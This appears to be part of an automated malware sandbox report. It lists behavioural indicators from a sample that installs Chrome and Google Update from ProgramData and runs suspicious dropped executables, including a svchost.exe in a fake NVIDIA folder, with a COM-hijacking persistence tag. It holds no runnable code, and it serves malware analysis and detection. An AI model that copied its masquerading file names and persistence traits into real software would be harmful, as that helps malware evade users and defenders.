Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TjNkNpAilaYvt.exe.log C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Checks installed software on the system

discovery

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\el.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\fil.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\chrome.VisualElementsManifest.xml C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_sk.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\fr.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\ml.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\ms.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\sl.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\th.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\v8_context_snapshot.bin C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\chrome.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_fil.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\default_apps\external_extensions.json C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\hu.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\ru.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\sk.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\uk.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\PrivacySandboxAttestationsPreloaded\privacy-sandbox-attestations.dat C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\os_update_handler.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_gu.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_hi.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_nl.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\d3dcompiler_47.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\it.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\tr.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\chrome_wer.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\chrome.dll.sig C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_iw.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\libGLESv2.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\133.0.6943.127\Installer\setup.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_pl.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ro.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\de.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\en-US.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\eventlog_provider.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ar.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_zh-CN.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\psmachine.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\lt.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\ta.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoDev.png C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\WidevineCdm\LICENSE C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoCanary.png C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ca.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_es-419.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_id.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_pt-BR.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_te.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\psuser.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_es.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_fi.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_lt.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_lv.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\chrome_100_percent.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\da.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\es-419.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ml.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI972C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_cs.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_en.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_zh-CN.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SystemTemp\GUTCB9A.tmp C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateComRegisterShell64.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_hu.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_iw.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\chrome_installer.log C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\chrome_installer.log C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdate.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateBroker.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\psmachine_64.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_de.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_hr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_uk.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateSetup.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_it.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ja.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ko.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\psuser.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_el.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_en-GB.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_hi.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\Installer\MSI976C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_bn.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_lt.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\Installer\MSI97DA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\psmachine.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fil.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_is.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ru.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_th.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_vi.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_et.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_nl.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_no.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ar.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_sw.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_da.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_gu.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_id.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ta.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_es-419.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\psuser_64.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_am.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fi.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_sk.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_sr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_sv.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_ur.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_zh-TW.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleCrashHandler.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdateCore.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMCB99.tmp\goopdateres_fa.dll C:\ProgramData\setup\setup.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\setup\aa.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\setup\setup.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
